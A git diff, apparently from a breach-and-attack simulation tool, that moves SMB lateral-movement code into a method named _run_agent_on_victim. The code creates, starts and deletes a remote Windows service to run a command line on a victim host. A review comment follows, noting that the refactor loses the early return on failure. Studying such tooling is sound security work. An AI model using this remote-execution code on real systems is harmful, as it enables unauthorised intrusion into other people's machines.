Agent: Extract method _run_agent_on_victim
parent
c3ba2cf6b2
commit
db09fe0cae
|
@ -69,37 +69,7 @@ class SMBExploiter(HostExploiter):
|
||||||
|
|
||||||
return self.exploit_result
|
return self.exploit_result
|
||||||
|
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
self._run_agent_on_victim(scmr_rpc, cmdline)
|
||||||
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
|
||||||
sc_handle = resp["lpScHandle"]
|
|
||||||
|
|
||||||
# start the monkey using the SCM
|
|
||||||
try:
|
|
||||||
resp = scmr.hRCreateServiceW(
|
|
||||||
scmr_rpc,
|
|
||||||
sc_handle,
|
|
||||||
SMBExploiter.SMB_SERVICE_NAME,
|
|
||||||
SMBExploiter.SMB_SERVICE_NAME,
|
|
||||||
lpBinaryPathName=cmdline,
|
|
||||||
)
|
|
||||||
except DCERPCSessionError as err:
|
|
||||||
if err.error_code == 0x431:
|
|
||||||
logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
|
|
||||||
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
|
||||||
else:
|
|
||||||
self.exploit_result.error_message = str(err)
|
|
||||||
return self.exploit_result
|
|
||||||
|
|
||||||
service = resp["lpServiceHandle"]
|
|
||||||
try:
|
|
||||||
scmr.hRStartServiceW(scmr_rpc, service)
|
|
||||||
status = ScanStatus.USED
|
|
||||||
except Exception:
|
|
||||||
status = ScanStatus.SCANNED
|
|
||||||
pass
|
|
||||||
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
|
||||||
scmr.hRDeleteService(scmr_rpc, service)
|
|
||||||
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
|
||||||
|
|
||||||
logger.info(
|
logger.info(
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
|
@ -219,3 +189,35 @@ class SMBExploiter(HostExploiter):
|
||||||
return scmr_rpc
|
return scmr_rpc
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def _run_agent_on_victim(self, scmr_rpc: DCERPC_v5, cmdline: str):
|
||||||
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
|
resp = scmr.hROpenSCManagerW(scmr_rpc)
|
||||||
|
sc_handle = resp["lpScHandle"]
|
||||||
|
|
||||||
|
try:
|
||||||
|
resp = scmr.hRCreateServiceW(
|
||||||
|
scmr_rpc,
|
||||||
|
sc_handle,
|
||||||
|
SMBExploiter.SMB_SERVICE_NAME,
|
||||||
|
SMBExploiter.SMB_SERVICE_NAME,
|
||||||
|
lpBinaryPathName=cmdline,
|
||||||
|
)
|
||||||
|
except DCERPCSessionError as err:
|
||||||
|
if err.error_code == 0x431:
|
||||||
|
logger.debug(f'SMB service "{SMBExploiter.SMB_SERVICE_NAME}" already exists')
|
||||||
|
resp = scmr.hROpenServiceW(scmr_rpc, sc_handle, SMBExploiter.SMB_SERVICE_NAME)
|
||||||
|
else:
|
||||||
|
self.exploit_result.error_message = str(err)
|
||||||
|
return self.exploit_result
|
||||||
|
|
||||||
|
service = resp["lpServiceHandle"]
|
||||||
|
try:
|
||||||
|
scmr.hRStartServiceW(scmr_rpc, service)
|
||||||
|
status = ScanStatus.USED
|
||||||
|
except Exception:
|
||||||
|
status = ScanStatus.SCANNED
|
||||||
|
pass
|
||||||
|
self.telemetry_messenger.send_telemetry(T1035Telem(status, UsageEnum.SMB))
|
||||||
|
scmr.hRDeleteService(scmr_rpc, service)
|
||||||
|
scmr.hRCloseServiceHandle(scmr_rpc, service)
|
||||||
|
|
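Review bot: The early exit on a failed service creation is lost: `_run_agent_on_victim` still ends its error branch with `return self.exploit_result`, but the new call site `self._run_agent_on_victim(scmr_rpc, cmdline)` discards the return value, so the caller continues to the `logger.info("Executed monkey ...")` line where the old inline code returned. A run in which `hRCreateServiceW` failed with any error other than 0x431 would then be logged, and possibly reported further down outside the hunk, as a successful execution, which makes the simulation's results unreliable for whoever reads them. Have the helper return a `bool` (`return False` in the error branch, `return True` at the end, annotated `-> bool`) and guard the call with `if not self._run_agent_on_victim(scmr_rpc, cmdline): return self.exploit_result`. The calling method's body starts and ends outside the hunk. The removed `# start the monkey using the SCM` comment would also make a reasonable one-line docstring for the new method.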